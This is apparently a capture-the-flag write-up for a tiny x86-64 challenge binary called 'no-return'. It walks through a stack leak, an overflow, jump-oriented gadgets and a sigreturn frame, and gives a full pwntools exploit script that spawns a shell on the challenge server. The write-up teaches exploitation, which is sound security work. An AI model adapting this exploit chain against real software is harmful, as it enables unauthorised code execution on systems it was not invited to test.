No Return

20 minutes to read

We are given a 64-bit binary called no-return:

Arch:     amd64-64-little
RELRO:    No RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

Reverse engineering

The binary is statically compiled and is so small that we can print the full assembly here:

$ objdump -M intel -d no-return

no-return:     file format elf64-x86-64


Disassembly of section .text:

0000000000401000 <.text>:
  401000:       5c                      pop    rsp
  401001:       5f                      pop    rdi
  401002:       5e                      pop    rsi
  401003:       5d                      pop    rbp
  401004:       5a                      pop    rdx
  401005:       59                      pop    rcx
  401006:       5b                      pop    rbx
  401007:       48 31 c0                xor    rax,rax
  40100a:       ff 67 01                jmp    QWORD PTR [rdi+0x1]
  40100d:       48 ff c0                inc    rax
  401010:       de f1                   fdivrp st(1),st
  401012:       ff 22                   jmp    QWORD PTR [rdx]
  401014:       48 2b 74 24 10          sub    rsi,QWORD PTR [rsp+0x10]
  401019:       f5                      cmc
  40101a:       ff 22                   jmp    QWORD PTR [rdx]
  40101c:       48 89 e1                mov    rcx,rsp
  40101f:       fd                      std
  401020:       ff 22                   jmp    QWORD PTR [rdx]
  401022:       48 8d 0c d9             lea    rcx,[rcx+rbx*8]
  401026:       fd                      std
  401027:       ff 21                   jmp    QWORD PTR [rcx]
  401029:       48 31 d5                xor    rbp,rdx
  40102c:       0f 95 c4                setne  ah
  40102f:       ff a5 00 00 44 e8       jmp    QWORD PTR [rbp-0x17bc0000]
  401035:       48 01 f4                add    rsp,rsi
  401038:       de f9                   fdivp  st(1),st
  40103a:       ff 22                   jmp    QWORD PTR [rdx]
  40103c:       48 01 dd                add    rbp,rbx
  40103f:       9b                      fwait
  401040:       ff 65 c7                jmp    QWORD PTR [rbp-0x39]
  401043:       88 a7 00 00 44 e8       mov    BYTE PTR [rdi-0x17bc0000],ah
  401049:       f9                      stc
  40104a:       ff 22                   jmp    QWORD PTR [rdx]
  40104c:       59                      pop    rcx
  40104d:       48 89 d1                mov    rcx,rdx
  401050:       5a                      pop    rdx
  401051:       ff 21                   jmp    QWORD PTR [rcx]
  401053:       48 ff c1                inc    rcx
  401056:       de f1                   fdivrp st(1),st
  401058:       ff 22                   jmp    QWORD PTR [rdx]
  40105a:       48 92                   xchg   rdx,rax
  40105c:       de f9                   fdivp  st(1),st
  40105e:       ff 21                   jmp    QWORD PTR [rcx]
  401060:       48 ff c3                inc    rbx
  401063:       de f1                   fdivrp st(1),st
  401065:       ff 22                   jmp    QWORD PTR [rdx]
  401067:       48 87 cf                xchg   rdi,rcx
  40106a:       fd                      std
  40106b:       ff 22                   jmp    QWORD PTR [rdx]
  40106d:       54                      push   rsp
  40106e:       48 31 c0                xor    rax,rax
  401071:       48 ff c0                inc    rax
  401074:       48 31 ff                xor    rdi,rdi
  401077:       48 ff c7                inc    rdi
  40107a:       48 89 e6                mov    rsi,rsp
  40107d:       ba 08 00 00 00          mov    edx,0x8
  401082:       0f 05                   syscall
  401084:       48 81 ee b0 00 00 00    sub    rsi,0xb0
  40108b:       48 31 c0                xor    rax,rax
  40108e:       48 31 ff                xor    rdi,rdi
  401091:       48 8d 36                lea    rsi,[rsi]
  401094:       ba c0 00 00 00          mov    edx,0xc0
  401099:       0f 05                   syscall
  40109b:       48 83 c4 08             add    rsp,0x8
  40109f:       ff 64 24 f8             jmp    QWORD PTR [rsp-0x8]

This time, the binary is just built for exploitation, there is no realistic functionality.

The real entry-point of the binary is at address 0x40106d. We can check it in GDB:

$ gdb -q no-return
Reading symbols from no-return...
(No debugging symbols found in no-return)
gef➤  start
[+] Breaking at entry-point: 0x40106d

So the main funcionality of the program is handled by this assembly code:

  40106d:       54                      push   rsp
  40106e:       48 31 c0                xor    rax,rax
  401071:       48 ff c0                inc    rax
  401074:       48 31 ff                xor    rdi,rdi
  401077:       48 ff c7                inc    rdi
  40107a:       48 89 e6                mov    rsi,rsp
  40107d:       ba 08 00 00 00          mov    edx,0x8
  401082:       0f 05                   syscall
  401084:       48 81 ee b0 00 00 00    sub    rsi,0xb0
  40108b:       48 31 c0                xor    rax,rax
  40108e:       48 31 ff                xor    rdi,rdi
  401091:       48 8d 36                lea    rsi,[rsi]
  401094:       ba c0 00 00 00          mov    edx,0xc0
  401099:       0f 05                   syscall
  40109b:       48 83 c4 08             add    rsp,0x8
  40109f:       ff 64 24 f8             jmp    QWORD PTR [rsp-0x8]

Analyzing assembly code

What the program is doing is writing data to stdout using sys_write and then reading input data using sys_read. Finally, it performs a weird jump. The `rogram just crashes when executing it normally:

$ ./no-return
Jasdf
zsh: segmentation fault (core dumped)  ./no-return

$ echo asdf | ./no-return
~Bzsh: done                              echo asdf |
zsh: segmentation fault (core dumped)  ./no-return

Notice that in sys_write we need these values:

$rax must be 1
$rdi stores the file decriptor (1 for stdout)
$rsi has the address of the string that will be written
$rdx contains the size to be written in bytes

  40106d:       54                      push   rsp
  40106e:       48 31 c0                xor    rax,rax
  401071:       48 ff c0                inc    rax
  401074:       48 31 ff                xor    rdi,rdi
  401077:       48 ff c7                inc    rdi
  40107a:       48 89 e6                mov    rsi,rsp
  40107d:       ba 08 00 00 00          mov    edx,0x8
  401082:       0f 05                   syscall

This instruction is just a memory leak (specifically a stack address leak). We saw it earlier but this is more clear:

$ echo asdf | ./no-return | xxd
00000000: 80c8 43e9 fc7f 0000                      ..C.....
zsh: done                              echo asdf |
zsh: segmentation fault (core dumped)  ./no-return |
zsh: done                              xxd

For the sys_read, these setup is needed:

$rax must be set to 0
$rdi must store the file descriptor (0 for stdin)
$rsi must contain the address to write the data into
$rdx must have the length to read

  401084:       48 81 ee b0 00 00 00    sub    rsi,0xb0
  40108b:       48 31 c0                xor    rax,rax
  40108e:       48 31 ff                xor    rdi,rdi
  401091:       48 8d 36                lea    rsi,[rsi]
  401094:       ba c0 00 00 00          mov    edx,0xc0
  401099:       0f 05                   syscall

The program is reading up to 0xc0 (192) bytes. And the data is stored on the stack (especifically in $rsp - 0xb0, because $rsi equals $rsp in the previous assembly block).

Finally, the program performs a jmp instruction to the address stored in the address pointed to by $rsp - 0x8 (notice the differences between jmp rsp-0x8 and jmp QWORD PTR [rsp-0x8]), after adding 0x8 to the register:

  40109b:       48 83 c4 08             add    rsp,0x8
  40109f:       ff 64 24 f8             jmp    QWORD PTR [rsp-0x8]

Buffer Overflow vulnerability

Hence, we can control this value, because the program reads up to 0xc0 bytes and the reserved stack buffer is 0xb0, so we can use the next 8 bytes to store an address to jump to (recall that NX is enabled, so we cannot add shellcode and jump to that section).

The only thing we have now is a stack address leak and a jmp instruction we can control. We must recall that there were more assembly instructions outside the entry-point.

Exploit strategy

The strategy is use sys_execve in order to get a shell. For that purpose we need:

$rax must be set to 0x3b
$rdi must contain the address where the command string is stored ("/bin/sh")
$rsi set to 0
$rdx set to 0

In order to control $rax and $rdi we can find some gadgets:

$ ROPgadget --binary no-return | grep ' rax'
0x000000000040100d : inc rax ; fdivrp st(1) ; jmp qword ptr [rdx]
0x0000000000401003 : pop rbp ; pop rdx ; pop rcx ; pop rbx ; xor rax, rax ; jmp qword ptr [rdi + 1]
0x0000000000401006 : pop rbx ; xor rax, rax ; jmp qword ptr [rdi + 1]
0x0000000000401005 : pop rcx ; pop rbx ; xor rax, rax ; jmp qword ptr [rdi + 1]
0x0000000000401001 : pop rdi ; pop rsi ; pop rbp ; pop rdx ; pop rcx ; pop rbx ; xor rax, rax ; jmp qword ptr [rdi + 1]
0x0000000000401004 : pop rdx ; pop rcx ; pop rbx ; xor rax, rax ; jmp qword ptr [rdi + 1]
0x0000000000401002 : pop rsi ; pop rbp ; pop rdx ; pop rcx ; pop rbx ; xor rax, rax ; jmp qword ptr [rdi + 1]
0x000000000040105a : xchg rax, rdx ; fdivp st(1) ; jmp qword ptr [rcx]
0x0000000000401007 : xor rax, rax ; jmp qword ptr [rdi + 1]

$ ROPgadget --binary no-return | grep -v xor | grep ' rax'
0x000000000040100d : inc rax ; fdivrp st(1) ; jmp qword ptr [rdx]
0x000000000040105a : xchg rax, rdx ; fdivp st(1) ; jmp qword ptr [rcx]

$ ROPgadget --binary no-return | grep ' rdi'
0x0000000000401001 : pop rdi ; pop rsi ; pop rbp ; pop rdx ; pop rcx ; pop rbx ; xor rax, rax ; jmp qword ptr [rdi + 1]
0x0000000000401067 : xchg rdi, rcx ; std ; jmp qword ptr [rdx]

Notice that I removed all the xor rax, rax because that instruction will break our strategy and set $rax to 0. For the moment, I will take a look at these gadgets:

$ ROPgadget --binary no-return | grep xchg | grep -E 'rax|rdi'
0x000000000040105a : xchg rax, rdx ; fdivp st(1) ; jmp qword ptr [rcx]
0x0000000000401067 : xchg rdi, rcx ; std ; jmp qword ptr [rdx]

With these gadgets, we are able to control the contents of $rax and $rdi if we control $rdx and $rcx.

In order to control $rdx and $rcx, we have these set of instructions from the top of the binary:

  401000:       5c                      pop    rsp
  401001:       5f                      pop    rdi
  401002:       5e                      pop    rsi
  401003:       5d                      pop    rbp
  401004:       5a                      pop    rdx
  401005:       59                      pop    rcx
  401006:       5b                      pop    rbx
  401007:       48 31 c0                xor    rax,rax
  40100a:       ff 67 01                jmp    QWORD PTR [rdi+0x1]

Notice that the last instruction is a jmp instruction to the address pointed to by the address stored in $rdi + 1, so we must store an address that contains a valid executable address in $rdi + 1 (we can’t set the address of "/bin/sh" yet). Moreover, although there is a pop rax, then xor rax, rax sets it to 0, so neither we can set $rax to 0x3b.

Hence, the idea is to control $rcx and $rdx and then call one of the previous gadgets. But there is a problem if we want to execute both, because they are kind of symmetric, and once the values are correct in the first gadget, then for the second one they will cause a crash. And we can’t go through the previous set of instruction because we lose $rax and $rdi.

Tweaking the strategy

Therefore, we will be using just one of the gadgets. In order to set the value of $rdi, I will use sys_rt_sigreturn, to restore a frame to the registers, so they are fully controlled.

For a sys_rt_sigreturn, we need that $rax equals 0xf, and nothing more. Hence, we can set this value with:

0x000000000040105a : xchg rax, rdx ; fdivp st(1) ; jmp qword ptr [rcx]

So, $rdx must have a 0xf and then the address pointed to by $rcx must contain the address of a syscall instruction (0x401082 or 0x401099). Once we reach the sys_rt_sigreturn step, we will set the registers to execute sys_execve.

Exploit development

Now that we have the strategy clear, we must implement it. First of all, we need to put data on the stack.

We may notice that we can use the last jmp instruction of the program to jump again to the entry-point. At first glance, this is not useful, but we can use a trick. Recall that the program reads up to 0xc0 bytes, but only 0xb0 were reserved. This is a kind of a Buffer Overflow vulnerability, but there is no return address to control.

Actually, there are no gadgets that end in ret, all of them end with a jmp instruction. In fact, the technique we are using is called JOP (Jump Oriented Programming).

Creating space for the payload

The key here is that we have 16 bytes to write. The first 8 bytes must contain an address to be executed next with the last jmp instruction. But I will use the second 8 bytes to leave the stack a bit cleaner. Hence, the first 8 bytes will store address 0x40109b (add rsp, 0x8), so that we reach again the jmp instruction, but with the stack totally clean for the next stack frame. The second 8 bytes will contain the address of the entry-point, you’ll figure out why in a second.

For the moment, we can write a loop in a Python script that has this functionality:

#!/usr/bin/env python3

from pwn import *

context.binary = 'no-return'


def get_process():
    if len(sys.argv) == 1:
        return context.binary.process()

    host, port = sys.argv[1].split(':')
    return remote(host, int(port))


def main():
    p = get_process()

    offset = 176
    junk = b'A' * offset

    for _ in range(8):
        leak = u64(p.recv(8).ljust(8, b'\0'))
        log.info(f'Stack address leak: {hex(leak)}')

        payload  = junk
        payload += p64(0x40109b)
        payload += p64(0x40106d)

        p.send(payload)

$ python3 solve.py
[*] './no-return'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Starting local process './no-return': pid 1015028
[*] Stack address leak: 0x7ffcd2a8edb0
[*] Stack address leak: 0x7ffcd2a8edb8
[*] Stack address leak: 0x7ffcd2a8edc0
[*] Stack address leak: 0x7ffcd2a8edc8
[*] Stack address leak: 0x7ffcd2a8edd0
[*] Stack address leak: 0x7ffcd2a8edd8
[*] Stack address leak: 0x7ffcd2a8ede0
[*] Stack address leak: 0x7ffcd2a8ede8
[*] Stopped process './no-return' (pid 1015028)

Notice that the stack address leak increases by 8 on each iteration. The fact is that with this procedure, we are having control over 8 bytes on the stack that will remain there until the program is terminated. We can tweak a bit the script to prove it in GDB.

def main():
    p = get_process()

    offset = 176

    gdb.attach(p, gdbscript='break *0x40109f')

    for i in range(8):
        junk = chr(ord('A') + i).encode() * offset

        leak = u64(p.recv(8).ljust(8, b'\0'))
        log.info(f'Stack address leak: {hex(leak)}')

        payload  = junk
        payload += p64(0x40109b)
        payload += p64(0x40106d)

        p.send(payload)

The script uses different characters as junk on each iteration. We can run it and continue in GDB a few times. Then we can show the stack:

gef➤  grep AAAA
[+] Searching 'AAAA' in memory
[+] In '[stack]'(0x7ffc34121000-0x7ffc34142000), permission=rw-
  0x7ffc34140fa8 - 0x7ffc34140fdf  →   "AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGG[...]"
  0x7ffc34140fac - 0x7ffc34140fe3  →   "AAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGG[...]"
gef➤  x/100x 0x7ffc34140fa8
0x7ffc34140fa8: 0x41414141      0x41414141      0x42424242      0x42424242
0x7ffc34140fb8: 0x43434343      0x43434343      0x44444444      0x44444444
0x7ffc34140fc8: 0x45454545      0x45454545      0x46464646      0x46464646
0x7ffc34140fd8: 0x47474747      0x47474747      0x47474747      0x47474747
0x7ffc34140fe8: 0x47474747      0x47474747      0x47474747      0x47474747
0x7ffc34140ff8: 0x47474747      0x47474747      0x47474747      0x47474747
0x7ffc34141008: 0x47474747      0x47474747      0x47474747      0x47474747
0x7ffc34141018: 0x47474747      0x47474747      0x47474747      0x47474747
0x7ffc34141028: 0x47474747      0x47474747      0x47474747      0x47474747
0x7ffc34141038: 0x47474747      0x47474747      0x47474747      0x47474747
0x7ffc34141048: 0x47474747      0x47474747      0x47474747      0x47474747
0x7ffc34141058: 0x47474747      0x47474747      0x47474747      0x47474747
0x7ffc34141068: 0x47474747      0x47474747      0x47474747      0x47474747
0x7ffc34141078: 0x47474747      0x47474747      0x47474747      0x47474747
0x7ffc34141088: 0x0040109b      0x00000000      0x0040106d      0x00000000
0x7ffc34141098: 0x34141b1b      0x00007ffc      0x34141b26      0x00007ffc
0x7ffc341410a8: 0x34141b37      0x00007ffc      0x34141b61      0x00007ffc
0x7ffc341410b8: 0x34141b72      0x00007ffc      0x34141b89      0x00007ffc
0x7ffc341410c8: 0x34141ba7      0x00007ffc      0x34141bc2      0x00007ffc
0x7ffc341410d8: 0x34141bda      0x00007ffc      0x34141bee      0x00007ffc
0x7ffc341410e8: 0x34141c05      0x00007ffc      0x34141c1a      0x00007ffc
0x7ffc341410f8: 0x34141c33      0x00007ffc      0x34141c47      0x00007ffc
0x7ffc34141108: 0x34141c55      0x00007ffc      0x34141c81      0x00007ffc
0x7ffc34141118: 0x34141caa      0x00007ffc      0x34141cb9      0x00007ffc
0x7ffc34141128: 0x34141d00      0x00007ffc      0x34141dc4      0x00007ffc

Alright, we found a way to increase the stack space and control what we are storing there.

Crafting the payload

To continue with exploitation, I will disable ASLR locally and use hard-coded addresses to implement the strategy explained above.

# echo 0 | tee /proc/sys/kernel/randomize_va_space
0

If we execute the same Python script, we will see fix addresses because ASLR is disabled:

gef➤  grep AAAA
[+] Searching 'AAAA' in memory
[+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
  0x7fffffffe6e8 - 0x7fffffffe71f  →   "AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGG[...]"
  0x7fffffffe6ec - 0x7fffffffe723  →   "AAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGG[...]"
gef➤  x/100x 0x7fffffffe6e8
0x7fffffffe6e8: 0x41414141      0x41414141      0x42424242      0x42424242
0x7fffffffe6f8: 0x43434343      0x43434343      0x44444444      0x44444444
0x7fffffffe708: 0x45454545      0x45454545      0x46464646      0x46464646
0x7fffffffe718: 0x47474747      0x47474747      0x47474747      0x47474747
0x7fffffffe728: 0x47474747      0x47474747      0x47474747      0x47474747
0x7fffffffe738: 0x47474747      0x47474747      0x47474747      0x47474747
0x7fffffffe748: 0x47474747      0x47474747      0x47474747      0x47474747
0x7fffffffe758: 0x47474747      0x47474747      0x47474747      0x47474747
0x7fffffffe768: 0x47474747      0x47474747      0x47474747      0x47474747
0x7fffffffe778: 0x47474747      0x47474747      0x47474747      0x47474747
0x7fffffffe788: 0x47474747      0x47474747      0x47474747      0x47474747
0x7fffffffe798: 0x47474747      0x47474747      0x47474747      0x47474747
0x7fffffffe7a8: 0x47474747      0x47474747      0x47474747      0x47474747
0x7fffffffe7b8: 0x47474747      0x47474747      0x47474747      0x47474747
0x7fffffffe7c8: 0x0040109b      0x00000000      0x0040106d      0x00000000
0x7fffffffe7d8: 0xffffeb1b      0x00007fff      0xffffeb26      0x00007fff
0x7fffffffe7e8: 0xffffeb37      0x00007fff      0xffffeb61      0x00007fff
0x7fffffffe7f8: 0xffffeb72      0x00007fff      0xffffeb89      0x00007fff
0x7fffffffe808: 0xffffeba7      0x00007fff      0xffffebc2      0x00007fff
0x7fffffffe818: 0xffffebda      0x00007fff      0xffffebee      0x00007fff
0x7fffffffe828: 0xffffec05      0x00007fff      0xffffec1a      0x00007fff
0x7fffffffe838: 0xffffec33      0x00007fff      0xffffec47      0x00007fff
0x7fffffffe848: 0xffffec55      0x00007fff      0xffffec81      0x00007fff
0x7fffffffe858: 0xffffecaa      0x00007fff      0xffffecb9      0x00007fff
0x7fffffffe868: 0xffffed00      0x00007fff      0xffffedc4      0x00007fff

And these were the leaks:

$ python3 solve.py
[*] './no-return'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Starting local process './no-return': pid 1031120
[+] Waiting for debugger: Done
[*] Stack address leak: 0x7fffffffe7a0
[*] Stack address leak: 0x7fffffffe7a8
[*] Stack address leak: 0x7fffffffe7b0
[*] Stack address leak: 0x7fffffffe7b8
[*] Stack address leak: 0x7fffffffe7c0
[*] Stack address leak: 0x7fffffffe7c8
[*] Stack address leak: 0x7fffffffe7d0
[*] Stack address leak: 0x7fffffffe7d8
[*] Stopped process './no-return' (pid 1031120)

Alright, now let’s build the payload to be executed. First of all, once we end the loop, we will jump to 0x401000, to set the value of some registers:

  401000:       5c                      pop    rsp
  401001:       5f                      pop    rdi
  401002:       5e                      pop    rsi
  401003:       5d                      pop    rbp
  401004:       5a                      pop    rdx
  401005:       59                      pop    rcx
  401006:       5b                      pop    rbx
  401007:       48 31 c0                xor    rax,rax
  40100a:       ff 67 01                jmp    QWORD PTR [rdi+0x1]

$rsp must be set to the address where the value for $rdi is stored
Dummy values for $rsi and $rbp
$rdi must contain an address (minus one) that contains the address of the next instruction to execute (the gadget at 0x40105a)
$rdx must have 0xf (because the gadget will move this value to $rax, so that we can execute sys_rt_sigreturn)
$rcx will have the address of an address that points to a syscall instruction (0x401082 or 0x401099)
Dummy value for $rbx

Then, the program will jump to the address stored in the address pointed to by $rdi+0x1, which is the gadget:

0x000000000040105a : xchg rax, rdx ; fdivp st(1) ; jmp qword ptr [rcx]

Here, the value of $rax will change to 0xf, and the jump will bring the program to execute sys_rt_sigreturn. Thus, after the previous data, we will put the frame that will be restored to the registers. In pwntools there is a class called SigreturnFrame that helps with this technique.

Once the registers are set as explained before, the program will spawn a shell.

For the moment, I will use recognizable values to identify the addresses that must replace those dummy values:

def send_data(p, data: bytes, offset: int) -> int:
    junk = data * (offset // 8)
    leak = u64(p.recv(8).ljust(8, b'\0'))

    payload  = junk
    payload += p64(0x40109b)
    payload += p64(0x40106d)

    p.send(payload)

    return leak


def main():
    p = get_process()

    offset = 176

    data  = b'/bin/sh\0'
    data += p64(0x40105a)
    data += p64(0x401099)

    data += p64(0xacdcacdc)     # rdi
    data += p64(0)              # rsi
    data += p64(0)              # rbp
    data += p64(0xf)            # rdx
    data += p64(0xcafebabe)     # rcx
    data += p64(0)              # rbx

    frame = SigreturnFrame()
    frame.rax = 0x3b
    frame.rip = 0x401099
    frame.rdi = 0xf00df00d
    frame.rsi = 0
    frame.rdx = 0

    data += bytes(frame)

    gdb.attach(p, gdbscript='break *0x401000')

    for i in range(8, len(data), 8):
        send_data(p, data[i : i + 8], offset)

    payload  = b'A' * offset
    payload += p64(0x401000)
    payload += p64(0xdeadbeef)  # rsp

    p.send(payload)
    p.recv()

    p.interactive()

Tweaking the payload

I’ll attach GDB to the process and set a breakpoint at 0x401000 (at pop rsp). We can run it until we reach this point:

gef➤  continue
Continuing.

Breakpoint 1, 0x0000000000401000 in ?? ()

We see the dummy value 0xdeadbeef that will go to $rsp:

gef➤  x/i $rip
=> 0x401000:    pop    rsp
gef➤  x/4gx $rsp
0x7fffffffe8e0: 0x00000000deadbeef      0x00007fffffffef46
0x7fffffffe8f0: 0x00007fffffffef5b      0x00007fffffffefaa

We need to change 0xdeadbeef to the address that stores value that needs to go in $rdi, which is the dummy 0xacdcacdc:

gef➤  grep 0xacdcacdc
[+] Searching '\xdc\xac\xdc\xac' in memory
[+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
  0x7fffffffe700 - 0x7fffffffe710  →   "\xdc\xac\xdc\xac[...]"

So 0xdeadbeef -> 0x7fffffffe700. We can continue:

gef➤  si
0x0000000000401001 in ?? ()

And set the new value of $rsp:

gef➤  set $rsp = 0x7fffffffe700
gef➤  x/i $rip
=> 0x401001:    pop    rdi
gef➤  x/4gx $rsp
0x7fffffffe700: 0x00000000acdcacdc      0x0000000000000000
0x7fffffffe710: 0x0000000000000000      0x000000000000000f
gef➤  si
0x0000000000401002 in ?? ()

Now let’s find the address where 0x40105a is stored:

gef➤  p/x $rdi
$1 = 0xacdcacdc
gef➤  grep 0x40105a
[+] Searching '\x5a\x10\x40' in memory
[+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
  0x7fffffffe6f0 - 0x7fffffffe6fc  →   "\x5a\x10\x40[...]"

So 0xacdcacdc -> (0x7fffffffe6f0 - 1), so that jmp QWORD PTR [rdi+0x1] goes to 0x40105a.

gef➤  set $rdi = 0x7fffffffe6f0 - 1

A few steps later, we must change the value for $rcx, which is set to 0xcafebabe, and should be 0x401099:

gef➤  p/x $rcx
$2 = 0xcafebabe
gef➤  grep 0x401099
[+] Searching '\x99\x10\x40' in memory
[+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
  0x7fffffffe6f8 - 0x7fffffffe704  →   "\x99\x10\x40[...]"
  0x7fffffffe7d8 - 0x7fffffffe7e4  →   "\x99\x10\x40[...]"

So 0xcafebabe -> 0x7fffffffe6f8:

gef➤  set $rcx = 0x7fffffffe6f8

Eventually, we will jump to the gadget and then execute sys_rt_sigreturn:

gef➤  x/i $rip
=> 0x401099:    syscall
gef➤  p/x $rax
$3 = 0xf
gef➤  x/40gx $rsp
0x7fffffffe730: 0x0000000000000000      0x0000000000000000
0x7fffffffe740: 0x0000000000000000      0x0000000000000000
0x7fffffffe750: 0x0000000000000000      0x0000000000000000
0x7fffffffe760: 0x0000000000000000      0x0000000000000000
0x7fffffffe770: 0x0000000000000000      0x0000000000000000
0x7fffffffe780: 0x0000000000000000      0x0000000000000000
0x7fffffffe790: 0x0000000000000000      0x00000000f00df00d
0x7fffffffe7a0: 0x0000000000000000      0x0000000000000000
0x7fffffffe7b0: 0x0000000000000000      0x0000000000000000
0x7fffffffe7c0: 0x000000000000003b      0x0000000000000000
0x7fffffffe7d0: 0x0000000000000000      0x0000000000401099
0x7fffffffe7e0: 0x0000000000000000      0x0000000000000033
0x7fffffffe7f0: 0x0000000000000000      0x0000000000000000
0x7fffffffe800: 0x0000000000000000      0x0000000000000000
0x7fffffffe810: 0x0000000000000000      0x0000000000000000
0x7fffffffe820: 0x0000000000000000      0x4141414141414141
0x7fffffffe830: 0x4141414141414141      0x4141414141414141
0x7fffffffe840: 0x4141414141414141      0x4141414141414141
0x7fffffffe850: 0x4141414141414141      0x4141414141414141
0x7fffffffe860: 0x4141414141414141      0x4141414141414141

Stepping again, the frame will be restored to the registers:

gef➤  si
0x0000000000401099 in ?? ()

gef➤  info registers
rax            0x3b                0x3b
rbx            0x0                 0x0
rcx            0x0                 0x0
rdx            0x0                 0x0
rsi            0x0                 0x0
rdi            0xf00df00d          0xf00df00d
rbp            0x0                 0x0
rsp            0x0                 0x0
...
rip            0x401099            0x401099
...

And there is the last dummy value (0xf00df00d), which must be the address where "/bin/sh" is stored:

gef➤  grep /bin/sh
[+] Searching '/bin/sh' in memory
[+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
  0x7fffffffe6e8 - 0x7fffffffe6ef  →   "/bin/sh"

So 0xf00df00d -> 0x7fffffffe6e8. If we change this value and continue, we will have a shell:

gef➤  set $rdi = 0x7fffffffe6e8
gef➤  continue
Continuing.
process 1145760 is executing new program: /usr/bin/dash
Warning:
Cannot insert breakpoint 1.
Cannot access memory at address 0x401000

Alright, we can modify the dummy values and see if the exploit works:

def main():
    p = get_process()

    offset = 176

    data  = b'/bin/sh\0'
    data += p64(0x40105a)
    data += p64(0x401099)

    data += p64(0x7fffffffe6f0 - 1)  # rdi
    data += p64(0)                   # rsi
    data += p64(0)                   # rbp
    data += p64(0xf)                 # rdx
    data += p64(0x7fffffffe6f8)      # rcx
    data += p64(0)                   # rbx

    frame = SigreturnFrame()
    frame.rax = 0x3b
    frame.rip = 0x401099
    frame.rdi = 0x7fffffffe6e8
    frame.rsi = 0
    frame.rdx = 0

    data += bytes(frame)

    for i in range(8, len(data), 8):
        send_data(p, data[i : i + 8], offset)

    payload  = b'A' * offset
    payload += p64(0x401000)
    payload += p64(0x7fffffffe700)   # rsp

    p.send(payload)
    p.recv()

    p.interactive()

And it works:

$ python3 solve.py
[*] './no-return'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Starting local process './no-return': pid 1192591
[*] Switching to interactive mode
$ ls
no-return  solve.py

Enabling ASLR

Now we need to turn on ASLR and bypass it. This can be done with the stack address leaks we have. Before enabling ASLR, let’s compute the addresses as an offset to the first leak. For that, I will take the first iteration outside the loop:

def main():
    p = get_process()

    offset = 176

    data  = b'/bin/sh\0'
    stack_leak = send_data(p, data, offset)
    log.info(f'Stack address leak: {hex(stack_leak)}')

    data += p64(0x40105a)
    data += p64(0x401099)

    data += p64(0x7fffffffe6f0 - 1)  # rdi
    data += p64(0)                   # rsi
    data += p64(0)                   # rbp
    data += p64(0xf)                 # rdx
    data += p64(0x7fffffffe6f8)      # rcx
    data += p64(0)                   # rbx

    frame = SigreturnFrame()
    frame.rax = 0x3b
    frame.rip = 0x401099
    frame.rdi = 0x7fffffffe6e8
    frame.rsi = 0
    frame.rdx = 0

    data += bytes(frame)

    for i in range(8, len(data), 8):
        send_data(p, data[i : i + 8], offset)

    payload  = b'A' * offset
    payload += p64(0x401000)
    payload += p64(0x7fffffffe700)   # rsp

    p.send(payload)
    p.recv()

    p.interactive()

$ python3 solve.py
[*] './no-return'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Starting local process './no-return': pid 1194870
[*] Stack address leak: 0x7fffffffe7a0
[*] Switching to interactive mode
$ ls
no-return  solve.py

These are the offsets to this stack leak:

$ python3 -q
>>> stack_leak = 0x7fffffffe7a0
>>> 0x7fffffffe6f0 - stack_leak
-176
>>> 0x7fffffffe6f8 - stack_leak
-168
>>> 0x7fffffffe6e8 - stack_leak
-184
>>> 0x7fffffffe700 - stack_leak
-160

We can even reference them to offset, which is 176:

>>> offset = 176
>>> 0x7fffffffe6f0 - (stack_leak - offset)
0
>>> 0x7fffffffe6f8 - (stack_leak - offset)
8
>>> 0x7fffffffe6e8 - (stack_leak - offset)
-8
>>> 0x7fffffffe700 - (stack_leak - offset)
16

So this is the updated exploit:

def main():
    p = get_process()

    offset = 176

    data  = b'/bin/sh\0'
    stack_leak = send_data(p, data, offset)
    log.info(f'Stack address leak: {hex(stack_leak)}')

    data += p64(0x40105a)
    data += p64(0x401099)

    data += p64(stack_leak - offset - 1)      # rdi
    data += p64(0)                            # rsi
    data += p64(0)                            # rbp
    data += p64(0xf)                          # rdx
    data += p64(stack_leak - offset + 8)      # rcx
    data += p64(0)                            # rbx

    frame = SigreturnFrame()
    frame.rax = 0x3b
    frame.rip = 0x401099
    frame.rdi = stack_leak - offset - 8
    frame.rsi = 0
    frame.rdx = 0

    data += bytes(frame)

    for i in range(8, len(data), 8):
        send_data(p, data[i : i + 8], offset)

    payload  = b'A' * offset
    payload += p64(0x401000)
    payload += p64(stack_leak - offset + 16)  # rsp

    p.send(payload)
    p.recv()

    p.interactive()

We can run it locally with ASLR enabled:

# echo 2 | tee /proc/sys/kernel/randomize_va_space
2

$ python3 solve.py
[*] './no-return'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Starting local process './no-return': pid 891062
[*] Stack address leak: 0x7ffd133ea7e0
[*] Switching to interactive mode
$ ls
no-return  solve.py

Flag

Alright, now let’s run it on server side:

$ python3 solve.py 157.245.46.136:31468
[*] './no-return'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to 157.245.46.136 on port 31468: Done
[*] Stack address leak: 0x7ffeff950900
[*] Switching to interactive mode
$ ls
11a866b981670122c056ee96ebb0796910a7495dc3ee2368fd127626af9e1b16-flag.txt
no-return
